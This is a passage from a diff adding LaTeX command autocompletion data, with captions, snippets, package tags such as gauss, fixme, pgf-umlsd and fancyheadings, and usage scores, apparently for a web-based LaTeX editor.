score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'gauss-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'gauss-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'gauss-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'gauss-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'gauss-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'gauss-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'gauss-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'gauss-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'gauss-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'gauss-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'gauss-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'gauss-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'gauss-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'gauss-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'gauss-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'gauss-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'gauss-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'gauss-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'gauss-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'gauss-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'gauss-cmd', + score: 
0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'gauss-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'gauss-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'gauss-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'gauss-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'gauss-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'gauss-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'gauss-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'gauss-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'gauss-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'gauss-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'gauss-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'gauss-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'gauss-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'gauss-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'gauss-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'gauss-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'gauss-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'gauss-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'gauss-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'gauss-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'gauss-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'gauss-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'gauss-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'gauss-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'gauss-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'gauss-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'gauss-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'gauss-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: 
'\\leftroot{$1}', + meta: 'gauss-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'gauss-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'gauss-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'gauss-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'gauss-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'gauss-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'gauss-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'gauss-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'gauss-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'gauss-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'gauss-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'gauss-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'gauss-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'gauss-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'gauss-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'gauss-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'gauss-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'gauss-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'gauss-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'gauss-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'gauss-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'gauss-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'gauss-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'gauss-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'gauss-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'gauss-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'gauss-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'gauss-cmd', + 
score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'gauss-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'gauss-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'gauss-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'gauss-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'gauss-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'gauss-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'gauss-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'gauss-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'gauss-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'gauss-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'gauss-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'gauss-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'gauss-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'gauss-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'gauss-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'gauss-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'gauss-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'gauss-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'gauss-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'gauss-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'gauss-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'gauss-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'gauss-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'gauss-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'gauss-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'gauss-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'gauss-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'gauss-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'gauss-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'gauss-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'gauss-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 
'gauss-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'gauss-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'gauss-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'gauss-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'gauss-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'gauss-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'gauss-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'gauss-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'gauss-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'gauss-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'gauss-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'gauss-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'gauss-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'gauss-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'gauss-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'gauss-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'gauss-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'gauss-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'gauss-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'gauss-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'gauss-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'gauss-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'gauss-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'gauss-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'gauss-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'gauss-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'gauss-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'gauss-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'gauss-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'gauss-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'gauss-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'gauss-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'gauss-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 
'gauss-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'gauss-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'gauss-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gauss-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'gauss-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'gauss-cmd', + score: 0.0063276692758974925, + }, + ], + fancyref: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fancyref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fancyref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fancyref-cmd', + score: 0.008565354665444157, + }, + ], + eufrak: [ + { + caption: '\\mathfrak{}', + snippet: '\\mathfrak{$1}', + meta: 'eufrak-cmd', + score: 0.025213895825856578, + }, + { + caption: '\\mathfrak', + snippet: '\\mathfrak', + meta: 'eufrak-cmd', + score: 0.025213895825856578, + }, + ], + fixme: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'fixme-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'fixme-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'fixme-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'fixme-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'fixme-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'fixme-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\endverbatim', + snippet: '\\endverbatim', + meta: 'fixme-cmd', + score: 0.0022216421267780076, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'fixme-cmd', + score: 0.0072203369120285256, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fixme-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fixme-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\par', + snippet: '\\par', + meta: 'fixme-cmd', + score: 0.413853376001159, + }, + { + caption: '\\verbatiminput{}', + snippet: '\\verbatiminput{$1}', + meta: 'fixme-cmd', + score: 0.0024547099784948665, + }, + { + caption: '\\verbatiminput', + snippet: '\\verbatiminput', + meta: 'fixme-cmd', + score: 0.0024547099784948665, + }, + ], + 'pgf-umlsd': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlsd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-umlsd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgf-umlsd-cmd', + score: 
0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgf-umlsd-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgf-umlsd-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-umlsd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlsd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgf-umlsd-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-umlsd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.000264339771769041, + }, + { + caption: 
'\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-umlsd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlsd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgf-umlsd-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgf-umlsd-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgf-umlsd-cmd', + score: 0.2864294797053033, + }, + ], + tgadventor: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgadventor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgadventor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgadventor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgadventor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgadventor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgadventor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgadventor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgadventor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgadventor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgadventor-cmd', + score: 0.021170869458413965, + }, + ], + fancyheadings: [ + { + caption: '\\lhead{}', + snippet: '\\lhead{$1}', + meta: 'fancyheadings-cmd', + score: 0.05268978171228714, + }, + { + caption: '\\chaptermark', + snippet: '\\chaptermark', + meta: 'fancyheadings-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\chaptermark{}', + snippet: '\\chaptermark{$1}', + meta: 'fancyheadings-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\fancypagestyle{}{}', + snippet: '\\fancypagestyle{$1}{$2}', + meta: 'fancyheadings-cmd', + score: 0.009430919590937878, + }, + { + caption: '\\footrule', + snippet: '\\footrule', + meta: 'fancyheadings-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\footrule{}', + snippet: '\\footrule{$1}', + meta: 'fancyheadings-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\fancyfoot[]{}', + snippet: '\\fancyfoot[$1]{$2}', + meta: 'fancyheadings-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfoot{}', + snippet: '\\fancyfoot{$1}', + meta: 'fancyheadings-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfootoffset[]{}', + snippet: '\\fancyfootoffset[$1]{$2}', + meta: 'fancyheadings-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\fancyfootoffset{}', + snippet: '\\fancyfootoffset{$1}', + meta: 
